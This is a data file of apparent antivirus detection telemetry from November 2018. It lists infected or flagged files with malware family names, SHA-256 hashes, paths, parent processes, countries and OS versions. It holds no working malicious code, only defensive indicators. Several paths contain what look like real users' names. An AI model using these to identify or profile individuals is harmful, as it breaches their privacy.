  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:49:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131037-146bc274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131037-146BC274', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130858-0ce72d2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130858-0CE72D2E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aspex_helpersrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Resources\\Resources\\SPEC_ANY\\AH\\aspex_helperSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008f5e9', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008f5e9', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='upghost.exe', filepath='E:\\win7\\sources\\upghost.exe', filesize=320000, name='W32/Sality.#M1.#R1'), hash='2e55549986c7ec7696cdbe6bd2565f55d166f0a2dcf0b3c7475b2792411d1fb6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T15:12:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175744-aae63beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b7bca73\\AVSCAN-20181104-175709-A6DA8255\\AVSCAN-20181104-175744-AAE63BEB', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='06967b05063de0517c283f751c4262fb8e7d30198fdaf1300ff24f0fc5a670b3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:57:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\ZWEWA8YO\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:46:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182697.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp105\\A0182697.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221456-814ff932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221456-814FF932', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-095733-331b77a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_463ec6aa\\AVSCAN-20181104-095641-2DF8930F\\AVSCAN-20181104-095733-331B77A2', filesize=64000, name='TR/Dldr.Hena.A.#M1.#R1'), hash='68f4238b31a205b4c2a5f4df6bba4cde5a4f77fa3c627ac03d5dda82d202457a', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:55:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='meyerson.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Purling\\meyerson.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='707434991aa835159ceb7b4756130cb31fe22640ed4295a9c647599d438c00eb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00061f37', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00061f37', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211734-150b60ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211734-150B60CE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:17:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T16:36:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00061faf', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00061faf', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160212-e4c21291', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dca68d4\\AVSCAN-20181104-160117-DDD53B36\\AVSCAN-20181104-160212-E4C21291', filesize=384000, name='TR/Black.Gen2.#M1.#R1'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140232-ef6d4d16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140232-EF6D4D16', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165501-5b597514', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22987c32\\AVSCAN-20181104-164043-F2BE9951\\AVSCAN-20181104-165501-5B597514', filesize=20000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='6311b05ecddcd0a31e8eeb7ebda701d6257f0a161a2cce498ef7bc517d1a822a', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:55:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-100233-33710064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15e3e13\\AVSCAN-20181102-094231-829B20AD\\AVSCAN-20181102-100233-33710064', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kvcphosf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kvCphOsf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{GBZYE-21BYK-T9UAE-5L03E-KBTFX-XRY8T}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rise of the tomb raider - installshield wizard.exe', filepath='C:\\Users\\X\\Downloads\\Rise of the Tomb Raider - InstallShield Wizard.exe', filesize=15232000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='b2c3f852e43ff4ddc1cf2eb945f06c846acb6fcf0adb9b44f8125635c7397dc3', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='f289744de714edb22223444ab7b379162cc4552e53ed75abec84efd571c00993', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T05:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filepath='/home/sneubert/Downloads/ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filesize=704000, name='TR/ATRAPS.Gen.#M2.#R699'), hash='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='Ubuntu 18', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-02T12:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xggkqj.exe', filepath='c:\\users\\X\\appdata\\roaming\\xggkqj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7B7345C9BBEA08DBE1D0E1E135889AF3BD8D9DDAB34D2C14F956D638D209C429', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7b7345c9bbea08dbe1d0e1e135889af3bd8d9ddab34d2c14f956d638d209c429', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='w_cproc_p_11.1.048_redist_intel64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\MSIs\\w_cproc_p_11.1.048_redist_intel64.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='debe1faa480cfe3729607fcfd0648df36b4a96ae658dc0865a0b7b0beac73db7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\miner.crypto.tm\\miners\\Win\\Equihash\\Ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--updated', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\miner.crypto.tm\\Crypto Miner.exe', parentsize=67460040, timestamp='2018-11-02T14:37:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cecp.exe', filepath='C:\\Users\\X\\Documents\\Mikroelektronika\\mikroC PRO for PIC\\cecp.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='d864af308c2aa9df890e0ad6f251a0df2a04bf8d82a0ca543d6dcc09af3dde28', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:20:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandrv.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDRV\\OCEANDRV.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b4c443611f34d5e6385e54844cfdcf231e19804ecbaf809ba370391c5070bbf7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081521-3be65faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081521-3BE65FAA', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='touchup.exe', filepath='C:\\Program Files\\The Sims 4\\__Installer\\DLC\\GP02\\__Installer\\Touchup.exe', filesize=972000, name='W32/Jeefo.A.#M1.#R1'), hash='aa5e55ecf34e18c71aa66fe596b1cdce7a729dbfad9567146a76072e98cfc405', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:t5d72lTX70e5LlxG.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder .exe', filepath='G:\\New Folder .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c99b7d439ce01204c8eeb0d92b82227be2a7f08e77f8e3cfdd094632c6bbdcc3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='killbox.exe', filepath="H:\\Hirens.BootCD.15.2\\Hiren's.BootCD.15.2\\HBCD\\Programs\\KillBox.exe", filesize=196000, name='W32/Ramnit.C.#M1.#R1'), hash='e0ce96af2847403ea4c68b2954486309f4544b81c02bcc738c98191fb6aacce4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-02T18:45:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\4lvefgjgzi2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541103062.5bdb5dd6b56e4', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\758684034.exe', parentsize=671232, timestamp='2018-11-02T05:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072205-93fa91ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_544a1cd1\\AVSCAN-20181102-072030-8E7FE97C\\AVSCAN-20181102-072205-93FA91AB', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\gby4lzh4f0l\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541109470.5bdb76de013e8', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\726426507.exe', parentsize=671232, timestamp='2018-11-02T07:33:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\USB Disk Security\\USBGuard.exe', parentsize=798720, timestamp='2018-11-02T02:38:48Z'), dt=datetime.date(2018, 11, 2)),
